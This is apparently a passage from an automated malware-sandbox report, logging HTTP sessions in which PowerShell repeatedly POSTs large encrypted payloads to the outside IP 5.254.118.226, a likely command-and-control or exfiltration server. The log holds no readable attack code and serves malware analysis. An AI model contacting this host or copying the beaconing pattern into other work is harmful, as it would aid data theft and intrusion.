Aug 28, 2021 00:07:02.077325106 CEST	6844	OUT	Data Raw: 8c 43 7e 1e 3d f6 46 a5 ef 59 99 9c ac 19 b6 6d 6f 82 76 23 c6 bb d3 5e b9 00 c8 2c cb 8a 17 94 06 04 66 42 0c 91 43 ac e1 81 cb ef a4 c3 74 29 dd db a3 00 61 4d d7 f9 8a 64 1d 31 23 d3 a4 3e 5f 4c 7d f5 22 2e 8f ca aa 83 33 b1 62 55 fa 0d 35 2b Data Ascii: C~=FYmov#^,fBCt)aMd1#>_L}".3bU5+@}5NBkI\62"j\ [[Nac#?UlFG=,6"J y+ojAL+LaJ,[m)nE>gp29._>'v"][B]
Aug 28, 2021 00:07:02.077347040 CEST	6850	OUT	Data Raw: 7b 31 d0 29 13 f6 f6 97 24 f6 a8 f8 f2 82 d8 24 1b 79 b3 e6 fb a6 78 c5 d9 33 66 be 46 be f5 f8 ac 80 4d 65 e0 8d 5d 2d b9 11 6e 1a 9a a1 9e 59 2a 5e 2e cc 3f 2e af 80 a1 d7 70 d1 8d 85 3f 18 61 67 ac da 80 52 00 00 24 13 1c 9b 5a c9 44 49 0c 4f Data Ascii: {1)$$yx3fFMe]-nY^.?.p?agR$ZDIO-0n~%~u/YBewJpVU\68nc'p^:#wtm+GFlNnAF)eBL?uy[M4Q?&92yr+lfU=
Aug 28, 2021 00:07:02.077483892 CEST	6851	OUT	Data Raw: a2 cc 28 3c d4 20 cc 55 be 57 9a d4 71 9d 52 7e c2 3f 48 cf 5f 88 ca 31 75 20 7c 39 0d 48 42 99 11 ff 70 17 c8 3f 63 58 c3 f3 b3 05 94 f4 94 e3 83 0e 7a a6 79 94 4e 00 93 3a f6 b0 bc a7 3b 58 18 20 67 93 8a 7b a9 1b 90 c7 d5 18 6c 0d 1d 66 be b4 Data Ascii: (< UWqR~?H_1u \|9HBp?cXzyN:;X g{lfNa WS^ZHh`/wXZet${nI%?#B.0]S^v?jwpt"m`Z1#*-:Qw^3b0wXZi#JcB+y
Aug 28, 2021 00:07:02.802706003 CEST	6888	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 190 Connection: keep-alive Data Raw: 0b cb 47 7e c8 69 e1 49 ad c6 9d ab 78 fb 80 76 d6 bb 3a b9 86 55 22 89 8f e0 ac 1e 75 7a 90 ee ab bd d2 29 77 5e 99 f8 24 f8 e6 1e 88 a8 d8 70 01 d9 c3 9e e5 78 f4 49 94 c0 c0 13 2f 95 b0 ea 9a b9 75 3a c8 bf 01 4a c4 59 12 41 2b 18 9f 0c 41 81 4f dc 8e 61 6c e3 1c fc 62 d9 06 cd f5 2d 61 35 77 6a 70 9e 4b a8 cd 41 fa 13 14 37 40 dd 35 d3 11 31 33 1e e7 34 64 a0 d2 6b 1c 00 be 97 38 66 d1 6a 7f 02 47 a4 56 1c b0 77 97 be ab 75 cf db 77 e9 7c 17 a8 14 cb f2 0a 98 ea c7 d5 54 56 b0 c6 3d a8 22 32 da e9 9a 74 79 79 df 9a e1 7a 16 a0 38 50 ec a1 35 11 1a 00 e9 d6 2a Data Ascii: G~iIxv:U"uz)w^$pxI/u:JYA+AOalb-a5wjpKA7@5134dk8fjGVwuw\|TV="2tyyz8P5*

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49742	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:02.872651100 CEST	6891	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 292 Connection: Keep-Alive
Aug 28, 2021 00:07:03.051563025 CEST	6891	OUT	Data Raw: a1 ac fc 40 86 04 5c c5 0b 4f d0 4c 9a a0 02 ed 0c 6a f0 39 a1 3d 57 ab 9a a6 97 84 f6 f2 e0 59 3a 02 1d 00 27 2c 8f a8 3f cd 3a e0 a7 91 60 85 7b 4e cf 30 23 83 88 aa f2 cc e1 0d ee 3e ca e1 23 8e 9b 2e df 3e f9 95 da 53 19 43 43 3f 08 19 96 34 Data Ascii: @\OLj9=WY:',?:`{N0#>#.>SCC?4npga7N8rPGX&#U(n4dKq7*Z(KCMLMaTOw?{SNbC/5E\\CDr{>10VGX6cgZ
Aug 28, 2021 00:07:03.432416916 CEST	6920	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 279 Connection: keep-alive Data Raw: ab e4 de f8 b7 54 63 16 ef 36 c1 fe be d5 30 13 23 10 7e e8 07 f9 26 66 c2 07 4d 96 ad d2 63 14 c1 84 de c9 be 7b 78 70 22 e8 de f0 0e 1a db 7d 31 09 9e 64 55 76 f3 34 e3 0e 3f 05 21 6d 4b 49 95 b7 6f b3 0b b2 ac 0c f6 4f ae 73 54 1f 9d 49 c1 7b ed 97 93 6f 98 d6 d3 6f 02 7e e2 6f 24 cb cf c1 24 68 53 9f d7 ba 7d d0 4e 68 ab 37 60 57 72 e3 62 26 34 94 90 80 8c 20 01 5d 86 c5 df 81 18 9b 97 b7 98 c4 26 5c 16 8b d3 2b 4c 02 21 dd 9f c8 95 7a 7b 94 46 a4 b3 5f b8 51 a1 d0 f5 3c 9b 15 5a d0 45 27 6c 4f c2 43 4d 97 6b 21 fe 66 b9 59 fd 6b f9 7c bb 64 cf 02 f4 a3 0b f9 18 a7 ca 5d 8d 62 bb f5 0e 0c 76 26 78 55 3f 88 f8 10 59 51 bc 6b e3 2c e9 99 07 7e e7 65 a5 f2 9e 51 e2 a5 9a f7 27 30 36 71 f7 8d 2c 28 bc a1 ae ff 0d 84 25 ce 06 93 00 3a 18 52 16 9b 2b 2c 74 29 f3 b0 3c 77 47 2a 6f 43 27 1e 37 4a 8a 78 cc ed d0 2d 0d 72 d7 25 21 Data Ascii: Tc60#~&fMc{xp"}1dUv4?!mKIoOsTI{oo~o$$hS}Nh7`Wrb&4 ]&\+L!z{F_Q<ZE'lOCMk!fYk\|d]bv&xU?YQk,~eQ'06q,(%:R+,t)<wG*oC'7Jx-r%!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49743	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:03.558406115 CEST	6921	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180642 Connection: Keep-Alive
Aug 28, 2021 00:07:03.558537006 CEST	6933	OUT	Data Raw: ce 65 6c a6 c8 1c 7d e8 d7 64 75 43 38 02 ae 69 af 9b 25 83 7f ce 1a 87 d2 6a f6 22 2b 0a e2 93 13 a7 3d f1 4e 26 be f3 5a 20 b3 f8 59 04 b1 85 9a 10 b2 fa 3b 8b a4 01 4b e3 d2 5f 24 5b be cd 81 e0 31 8f c4 bb 1c 00 c2 67 4c 4c 5e 51 cb c5 00 07 Data Ascii: el}duC8i%j"+=N&Z Y;K_$[1gLL^Qoc6k0+i4'+NrJ8[2A/+ o?XlFE>k%P2{[e2Y~\|fevSK9`5P&6iz

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49744	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:03.802257061 CEST	6933	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180952 Connection: Keep-Alive
Aug 28, 2021 00:07:03.802393913 CEST	6945	OUT	Data Raw: 2a 25 c8 85 42 1f e8 d6 08 93 a2 21 48 01 cf 80 af 60 f1 ba d4 10 70 09 9e 5b dd 30 81 55 bd 1b 57 f2 13 0a ad f5 b1 df ce 29 fc c8 82 12 9b f1 a5 1b 60 ab 2a 99 e9 1b b3 c0 e6 e6 40 b9 56 b2 d5 87 c8 55 ec c6 d2 b8 ad 12 ea ab 12 a7 85 8d be eb Data Ascii: %B!H`p[0UW)`@VUfUKHGH>;Y)T0LrpEwNHL/d;lbeCXlo*3A%9'\|>Q16fa=zC/o5G[:0RPD
Aug 28, 2021 00:07:03.945653915 CEST	6946	OUT	Data Raw: cd e2 5f f2 d9 5f 1d 3c 6c 9d bd 96 52 b4 11 d6 ad 5d 33 79 d7 35 fb 98 7a 57 8c 9d ab d3 16 f2 94 1f ff d6 a2 86 f1 af cf f8 55 3e 61 ce 43 4b 15 28 66 88 9f b8 19 af 91 07 f2 87 79 65 68 19 f9 a3 41 b5 64 60 93 5d c2 9e 09 12 e9 5f 3e 09 b3 0f Data Ascii: __<lR]3y5zWU>aCK(fyehAd`]_>NOH[HpyZ;&x9mtPVh`N`pJGrbojiHM=#h bcL7y\52pY9y9Q(/..?z:Pmvj/0S^BW;W p
Aug 28, 2021 00:07:03.947309017 CEST	6969	OUT	Data Raw: 83 3c c7 b1 64 07 6a aa 80 49 b1 37 bb 14 f1 79 43 c6 1c d2 09 85 a2 39 cc ee ba ab 53 37 fc d1 1d 87 b6 23 4d b4 3b 78 09 f3 5e 87 3c 22 e3 76 21 9e f4 f7 fe f9 e2 0f db ed 7a 3b 36 9e 9a 9a 68 81 e8 47 80 ba 78 fd fb 73 01 db f6 b8 3f 4d cc 67 Data Ascii: <djI7yC9S7#M;x^<"v!z;6hGxs?MgRW\6Z8U7; >G!zoqQZR(:2mC3eAsag=0r\g&8pu}J1B\16REXM*0[)y
Aug 28, 2021 00:07:04.013232946 CEST	6971	OUT	Data Raw: 71 ea e4 a7 f2 63 a9 4e d8 1d 87 ab 68 cb 7e 1d 1b 0f 88 b9 58 14 2b 49 d7 e4 9c 3a 5f f2 15 7e 33 de 5d e7 d1 4f 71 c7 c6 b7 b4 45 1a 38 d7 d5 0b ae e7 a5 b3 00 59 25 31 98 23 6f e9 57 92 97 1f 89 78 ea 20 5f 58 2e b8 65 ce da 5c 2b b7 a2 da a5 Data Ascii: qcNh~X+I:_~3]OqE8Y%1#oWx _X.e\+foO4aJi)t!_d-IAF\/B\J6n#nX{yMOka.kMZ(,1of'm(CIMU?B}nPA(Z1qNa/fD\|kW--Pp4:0nu
Aug 28, 2021 00:07:04.024621010 CEST	7002	OUT	Data Raw: 17 31 36 69 f3 9c ed 41 fc a2 56 df 7c 9f a7 2f 64 0f eb 25 c7 40 24 93 2c 6c ed 0a 09 01 74 6b 2a a9 47 7a ac 6f 87 6f dc 01 10 2a fd ad 4e 78 2e 8d a4 ed b4 dd 9b 5c 9e 11 fd 71 3b b6 5e 4d 1e 62 fe ce fe 9d 94 ef c9 f2 7a ad 49 82 79 6f f3 e2 Data Ascii: 16iAV\|/d%@$,ltkGzooNx.\q;^MbzIyoVBGk2omQL.Vs1@@UqDz\|m:SdU^J4j$q.DR_1ifZ^uvi*oCl"rv
Aug 28, 2021 00:07:04.024744987 CEST	7007	OUT	Data Raw: 46 9d 7e fc 50 3a 19 4d aa be 27 36 55 a4 b2 f4 eb 34 49 fd ec 4f 4e 26 cf bd 7d 7e ac 6d 08 07 1c 9a 20 0f 31 24 11 c2 f5 e2 28 40 e6 a6 cf 6e 90 8e 0e 4d 5e 5c c8 4a d0 a2 3f 7b 2f a8 b7 59 c5 ac c6 94 f0 2a 1c 4e f3 16 3d 80 2a 3f 3a 33 20 41 Data Ascii: F~P:M'6U4ION&}~m 1$(@nM^\J?{/YN=?:3 A$VEiduOYy.Y1s%S@9R5.SQx?0a_w}`p`yhZ}w6 N@w~xu_@@UI04>9fEnVB@"O[d1zM&T
Aug 28, 2021 00:07:04.082683086 CEST	7010	OUT	Data Raw: b6 18 29 9b 32 4e e1 1d 53 b2 be cc 2d 50 1d 30 5b 15 39 26 64 69 6c 3c 19 1c db 3c ee 2b 73 e5 13 7b a9 1b 0e 02 21 d7 02 e8 0b 09 5a 1b 39 05 86 4c 54 04 74 8d 9d 08 d4 58 77 45 8b 63 b8 60 67 56 cd c6 06 d1 17 8b 66 8d be 2a 5e 68 6e ea 8e 39 Data Ascii: )2NS-P0[9&dil<<+s{!Z9LTtXwEc`gVf*^hn9T+{{'2M(=4u''j.5w0K/tLc33UeBnw}DEnsl#K4w7cHv@x(Rw<~]Ty8e-Xu<3%
Aug 28, 2021 00:07:04.082746029 CEST	7012	OUT	Data Raw: 88 37 48 8e 70 a5 5d 80 9b db d4 e5 8d 15 a7 86 c2 c5 e3 3b 6f 1b 97 25 d1 03 8e d3 77 04 4b 08 82 76 18 47 65 74 12 47 46 5c f2 d4 69 0b c0 34 03 3a 05 05 f8 80 10 91 e7 4d d8 c0 d8 64 8d c2 4e 3c 5a ad 1c 29 59 c5 67 b6 ce 0f 94 d0 c5 17 9e a7 Data Ascii: 7Hp];o%wKvGetGF\i4:MdN<Z)YgeCZ#2;R8A_o`::W4b<43M%=`=b_Bb\kcZ4x@91\Yc;rwEM-=.vq6H!
Aug 28, 2021 00:07:04.094089985 CEST	7018	OUT	Data Raw: ea 61 d4 87 01 3f 8a 6f e1 82 ca 3f 2e aa 80 cb df 9c a5 6b bd 9d cf b9 f5 b3 f4 69 14 10 90 5f f4 01 0f bc fa 28 8f a9 77 75 0f 72 8c 50 17 8d ee 0b ee 41 42 c4 b6 ff f1 b5 5f d8 bf 51 64 62 dd 1c 5a 6a 55 6a f3 eb b3 18 da 61 dd aa a9 94 9b 7b Data Ascii: a?o?.ki_(wurPAB_QdbZjUja{Dby`M[~E$JRYWCKc&<&SP8d\|>h(K}!vr2R>Ce@nP\)CZ\|+-23
Aug 28, 2021 00:07:04.094155073 CEST	7020	OUT	Data Raw: 7a 11 3b 6b 7e 73 3b f4 a2 30 fa 0b b6 47 f1 ac cd 5a d1 eb fb 52 99 1e 6f eb 34 8b 06 4f 41 37 c2 f3 46 21 11 f5 60 1c 2a 15 39 02 ce d2 6e 1e 94 37 d3 af 5e 18 98 e5 7c 5d c8 6f b9 0a c6 2a 8c 0b ff ff 64 67 d9 e9 04 15 59 48 84 a2 b8 84 b0 68 Data Ascii: z;k~s;0GZRo4OA7F!`9n7^\|]odgYHhzwzAuiSJ(yCw(gs~AiL'MxkR}!oR\|?!YpN&-S=D/eb~VZ{G}_-c pUu1Vxz+~
Aug 28, 2021 00:07:05.075676918 CEST	7113	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 121 Connection: keep-alive Data Raw: 6b 8e f9 9d a4 61 ba fd 33 66 6d 76 36 22 89 02 70 bb 30 91 96 35 b5 7e 14 59 68 7b 6b e3 d0 e5 a3 8e fb 23 1c 8b ef 2a aa bd 4c 03 b6 10 39 e7 58 02 8e 0f 3b 1d d4 b8 00 ce 42 cc 66 6f b0 5a ce 8f 4c d1 fa 43 4b d2 6c 55 cc 4a 6f 7a b7 ae e0 60 2e bd bf 71 e1 92 b9 00 2b 6a c3 c4 c5 9e a4 df a5 be 43 17 9f 75 4e 25 89 f7 1c 3e 13 2b 82 85 24 cc 40 f7 0f 4d c1 Data Ascii: ka3fmv6"p05~Yh{k#*L9X;BfoZLCKlUJoz`.q+jCuN%>+$@M
Aug 28, 2021 00:07:05.077172041 CEST	7113	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 754

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49745	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:05.309186935 CEST	7114	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 369
Aug 28, 2021 00:07:05.450928926 CEST	7115	OUT	Data Raw: b0 1c 27 85 37 ec f5 46 b0 b8 6b 9d 77 75 f5 58 fb 63 8f 08 84 1b b2 82 0b e5 93 a5 9f a2 cc 53 52 f3 ba fb 26 68 ea ef b5 f5 6f 8b ad 80 58 f2 e1 1e 30 b4 ce f2 b3 96 69 a3 7a 51 5a 50 a5 0e ea 18 4b 83 ba f9 32 93 78 9f 51 8d aa 27 d4 89 8d 9f Data Ascii: '7FkwuXcSR&hoX0izQZPK2xQ's_@$fPb69=0&Co[Hb:;%r8\NZQrYo`0:)[{iK[)(O~\#w\G{i=p`)R}\&w-y6wOb=*deI
Aug 28, 2021 00:07:05.727417946 CEST	7115	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 220 Connection: keep-alive Data Raw: 5a 13 03 79 d0 93 08 8c a2 b4 97 f8 c5 0f 42 45 b3 57 84 2e 36 07 ed 50 b9 e7 c1 8b 26 9f d8 66 20 5d 1d 90 87 fd 24 71 ab 26 e2 d1 97 ec 54 5b 8b 46 70 bc 7f 43 a7 3d 69 1c cb ca d5 52 dc d2 30 4b 8c ed 5e 50 16 cc b3 a3 ef e0 b5 a9 f3 47 d7 cf 79 e7 2b b3 b5 f8 2a 62 74 e7 47 4f 17 ee 7e 22 fe 35 54 6f 1d 76 ab dc 1a f5 60 ed f8 f2 bc f1 e0 14 f9 11 ae a7 57 31 d9 9e 92 61 8b b7 09 a6 60 cf 3d df 45 61 2f a9 90 9a 1d 0d 8f 62 10 1b a3 6a 60 f3 d4 a8 60 83 5a 98 98 57 e5 8e 12 64 1e 9c 86 e4 3a 0a a6 bd f8 f1 45 7b 05 8d 73 43 b2 c2 3a 02 f7 63 4a 9f 17 00 09 a6 e8 e5 49 91 bc 5d 88 58 8c c4 d7 91 b6 4c 97 0c 2a f7 61 c9 00 3b 00 27 9c a2 e2 27 e6 6f Data Ascii: ZyBEW.6P&f ]$q&T[FpC=iR0K^PGy+btGO~"5Tov`W1a`=Ea/bj``ZWd:E{sC:cJI]XLa;''o

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49746	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:09.432867050 CEST	7116	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180685 Connection: Keep-Alive
Aug 28, 2021 00:07:09.432991982 CEST	7128	OUT	Data Raw: 0c 6f 99 e5 0b 29 69 9a c9 bb dc 5a 85 d6 1d 53 7b 0e c7 1f 87 40 bf c8 2c 6d 75 08 bb 7e 5b 16 bc 51 7f ec 55 d2 1b ae bb 11 3d 65 51 e9 f6 ef 16 5b 53 94 2f e4 b1 cb af d0 ba 9c b3 62 de 4b 61 c7 9c 34 58 30 fd a8 f1 19 62 76 03 5a 77 41 76 85 Data Ascii: o)iZS{@,mu~[QU=eQ[S/bKa4X0bvZwAv`+>}Z2N\;UZyK22ET\Pdv4d2Wz<^Bf77>0s{9-{mn8\vkA.Oa_[9;&7#p;Q?sQid<
Aug 28, 2021 00:07:09.511276960 CEST	7141	OUT	Data Raw: d7 65 7a 0c 7f 37 31 fd 56 8a 6c 5e 89 ab 31 66 bd f1 69 ef a4 bd c9 f7 17 ab 81 df db 20 d1 0e d8 17 f8 64 b7 00 ed d6 af 3c 7d af a3 f1 8e 52 eb 5c de 9e 31 76 cb 54 1d da 98 f2 22 3a a5 60 23 6c 1b cd 16 2e 71 b0 0b 1a 35 4d fa c1 51 6b a5 dc Data Ascii: ez71Vl^1fi d<}R\1vT":`#l.q5MQkf\| s&%tCtSOVX6$PLui I}U+0j(1r(=n95mbh44#,@,,8s\|.GGuXOv~C
Aug 28, 2021 00:07:09.511455059 CEST	7164	OUT	Data Raw: 98 8e 3f 4d ee 23 9a 04 dc 93 dc 33 37 28 fb fa 99 c5 60 d8 16 39 cc 54 8d 3e 63 0f b2 b3 0a 07 1a 8a da 8a e6 b8 d8 c2 53 88 d3 ae da 29 6a 43 b4 aa b0 ac 73 02 34 3c 58 1a 92 bb 30 eb 52 aa cb e9 34 f0 73 af 87 ae b5 d3 5b a0 16 50 4a 01 67 49 Data Ascii: ?M#37(`9T>cS)jCs4<X0R4s[PJgIESwi"/g.iLX<8#)Jz `CWV-82Jc-?Xbqi:o?Jo3*GBv[N=6QECe:LG[^65l%0R

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49747	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:09.510404110 CEST	7128	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 181069
Aug 28, 2021 00:07:09.510545969 CEST	7140	OUT	Data Raw: ed f3 40 1e 35 1c 8a 41 8c 34 c2 f7 1a 70 d2 1e d6 2a fa 7b aa 6e fe 6d 57 7d c9 92 8d 4a e5 73 b1 8d e0 89 7d 2e 65 90 68 b1 11 85 02 74 30 8f 64 6b 7b 45 13 83 4e 80 f4 d1 c6 b6 52 f7 b3 42 4d 4f 47 8c 8f 49 a0 a8 c4 6b 14 f7 5e 7a 6b e2 4e 3b Data Ascii: @5A4p*{nmW}Js}.eht0dk{ENRBMOGIk^zkN;."`.?`g>o8-pV"zfisM/B.B;W"?DD'l[Vfhz[8.:u6\d5Sjn?VJ2#s]lqiDhO\O
Aug 28, 2021 00:07:09.577315092 CEST	7165	OUT	Data Raw: b0 1e cd 3e 58 c7 4d 17 52 5e 4e 06 fb 44 fd d8 18 0a 0a cc 6d cb cd ca 29 a1 33 f4 38 76 54 35 38 22 d5 0b 0a f9 e2 26 44 c9 7b 97 e1 99 a1 fa e5 49 e4 32 2a 6f d4 ec 05 e2 a3 9b a4 2a 8a 49 17 43 3e 55 20 e6 3e 1f 0c fe c2 44 0d 6f 0e db 63 77 Data Ascii: >XMR^NDm)38vT58"&D{I2oIC>U >Docw1Zh[h2dgKg+r!07qilfjN6P_a&h,8nvVdJg'q@@ R3i41f Q!OL0[(7Ok
Aug 28, 2021 00:07:09.577354908 CEST	7168	OUT	Data Raw: c3 d8 dc 31 b7 83 f6 1d 09 be 68 14 11 33 3c 29 ee ea 70 44 b8 48 ed 4b 2c 54 cd f7 4d e2 05 d2 16 41 99 08 83 54 2e d7 df d0 d4 08 4b 27 db c3 fe 5a 31 38 7e 3c a2 ce 77 ba af 7b 03 e4 0a 87 16 63 aa 8a d9 11 a5 50 7e 87 33 e2 51 40 df 6c 0a 7f Data Ascii: 1h3<)pDHK,TMAT.K'Z18~<w{cP~3Q@l,hZPIzu6G&z\icFN{P+B;;ucEDm%9.t0\|5{!(nrS)jY][QB%d~ru=}@0afFYo
Aug 28, 2021 00:07:09.577435970 CEST	7171	OUT	Data Raw: 8a 04 99 be b9 2b a9 3f 20 c0 26 70 e5 b8 3d fa e1 c3 a9 2a 02 63 68 13 55 d3 cb 6c 5a 42 5b b4 92 8a aa 69 45 fb c8 65 5f 1e a2 6a 6f ef 61 4c 88 1c 9a f1 72 ea 62 8d 60 37 9d 10 49 53 1b 01 96 8e 1e b4 33 3c ae ea 6d 4a 56 bb 9f 42 1c 8d f2 22 Data Ascii: +? &p=chUlZB[iEe_joaLrb`7IS3<mJVB"6d/C7nl(nS~-@5gbRt\Ts%PHJ<&&iO/\"XPy$G4\O2?>Auq8I94cU*%z$4
Aug 28, 2021 00:07:09.577452898 CEST	7173	OUT	Data Raw: da 47 6e d6 be 83 a0 5f d7 44 87 fd 61 6a ce 7d 60 0e 80 09 c1 43 eb 21 91 39 cc b3 c3 53 27 ce 1c 09 e9 f3 7a 28 49 24 71 eb 48 f1 11 e3 fd 81 4e 07 01 4d c3 86 4d 89 07 5a b2 c5 f9 b9 65 5a c7 ad 2f c8 53 d1 00 5b dc 02 07 e5 a9 16 f3 1a 41 99 Data Ascii: Gn_Daj}`C!9S'z(I$qHNMMZeZ/S[AJ8`4i8n?B>XIW!}<!d,{e,RrL"<1Ye/3+@f~hioR^EUa&Z0w@+hjwP(
Aug 28, 2021 00:07:09.577581882 CEST	7176	OUT	Data Raw: a4 cb 08 5b 40 1d 4f e4 ca 09 bf c7 09 ba 46 2e ed b0 8a f9 b4 c9 44 64 14 69 9a 65 70 6f 73 d7 eb a5 83 db dc 63 03 f5 6b df 85 87 99 f9 80 bd 4d 45 3f d4 75 7e 89 6d 67 42 bf 4a 86 64 77 39 0f 18 9e 30 76 98 e1 7c 1a d9 3c ae c3 67 5e 2b 6a 9a Data Ascii: [@OF.DdieposckME?u~mgBJdw90v\|<g^+jMgj;8&NP[![.]0\|5oDcNW.h/@/\IO`R,R9sAl-g1=f$!7/"BN6YX
Aug 28, 2021 00:07:09.577595949 CEST	7179	OUT	Data Raw: db 43 c0 69 a8 05 67 90 30 6b c3 41 8b 5b 33 80 90 4e 4c f7 05 8a 55 7f bd a8 a5 e4 99 96 20 cc 5c 99 b3 87 7c f0 9b 5e ef e8 b5 96 43 86 29 40 27 75 fe 43 ba 97 4b b3 a7 82 ab 36 48 64 94 cd f4 fb f9 99 d3 1f 10 2d 43 40 9c 31 f7 61 d0 75 cc 82 Data Ascii: Cig0kA[3NLU \\|^C)@'uCK6Hd-C@1aubx'6aV@;@3OGBtY=j6eQMF;@/w]Ta$c.{C&fA#/`X^`GQbqEz\$05Nw8qvna2\Q.
Aug 28, 2021 00:07:09.577620983 CEST	7182	OUT	Data Raw: e3 f3 37 1b 2d 50 11 37 31 73 2b 55 b6 f2 5d 42 30 fc 11 63 21 c6 29 50 44 db b0 86 96 f9 87 77 83 df 18 88 4f 97 dc 46 9d f4 ec 57 b9 d4 e4 ed 66 7d d6 0b ed 2f 4c 1d 1a 8f 04 28 6f 6d 8f f3 0a f2 fd f1 93 a5 32 b2 5c 3d 2c e6 80 99 6e 0a d4 09 Data Ascii: 7-P71s+U]B0c!)PDwOFWf}/L(om2\=,nI/U\|Dx%40n];q88.@vR8N@+zP_~HvylM<i'yLtI.w]`q#<P#ZYQ/Z&x
Aug 28, 2021 00:07:09.577697992 CEST	7184	OUT	Data Raw: 2a da 53 bf ab 73 b9 a4 4b c9 b9 02 2d 42 73 00 44 73 5f 7b 8d 1d 8c cc aa b5 f1 34 91 0d f4 6f 99 60 a8 1e 05 42 d4 c4 6e 5e c5 b5 be 9f bc 8c bb a3 0a 60 90 aa 22 a2 7e f3 80 aa a2 b1 02 d5 3b f9 f3 e9 42 99 54 8d b0 20 14 70 72 7f 9f cc c6 f0 Data Ascii: *SsK-BsDs_{4o`Bn^`"~;BT prIgq]{'3@k!lZ%OKw&mV0EGTF\|:'p5D0%`K,ImRQlzw@mU?<!}>t{ivRVkPX)B8&mPU
Aug 28, 2021 00:07:09.577771902 CEST	7187	OUT	Data Raw: 2a 9a d5 06 63 4b 7a 9a a0 28 f1 ec 16 3d 7c 85 3f a6 38 3c ac b3 2f b0 be cc 60 b6 d9 d0 85 04 34 cf fd b0 be f9 50 cb 26 74 15 ab cb 3b 60 9c 36 a7 d6 a6 91 16 d6 39 6e 7a 1e da 01 0d 9a 78 98 f3 6e 21 6f f2 ff 55 9c b4 57 0e 8e b0 a1 cc 1c 6d Data Ascii: cKz(=\|?8</`4P&t;`69nzxn!oUWmD-HG+('>T;>X0^])]mf}D/~k%raNWmcKf/L`'T:KP,gs7-<'D3T#%'$AG5MC$vjzcK#
Aug 28, 2021 00:07:12.003201008 CEST	7714	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 193 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49748	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:09.581824064 CEST	7190	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 181024 Connection: Keep-Alive
Aug 28, 2021 00:07:09.581954002 CEST	7202	OUT	Data Raw: 6a fc b2 8f 43 56 26 0d c7 9d f1 48 df 89 2b 98 e6 dd 60 da 20 14 02 9a db a7 d2 f8 4a 8c 7e c8 46 8d 9b b8 6c f7 2a ec e7 bc 32 bb 7c e2 2d b6 b7 bc df 0f e7 21 c2 57 fb 19 b2 9a 83 2d c1 3c 1f 29 03 53 ed 72 2d ed b3 72 f1 62 e1 45 1e f8 7b 1c Data Ascii: jCV&H+` J~Fl*2\|-!W-<)Sr-rbE{Ap%ETEjTFZu/at g5I%6gSjhYogO H5m1}8"fR3jEsmI(X-.H8)gZWr+_W5`

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49749	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:09.757829905 CEST	7216	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180951 Connection: Keep-Alive
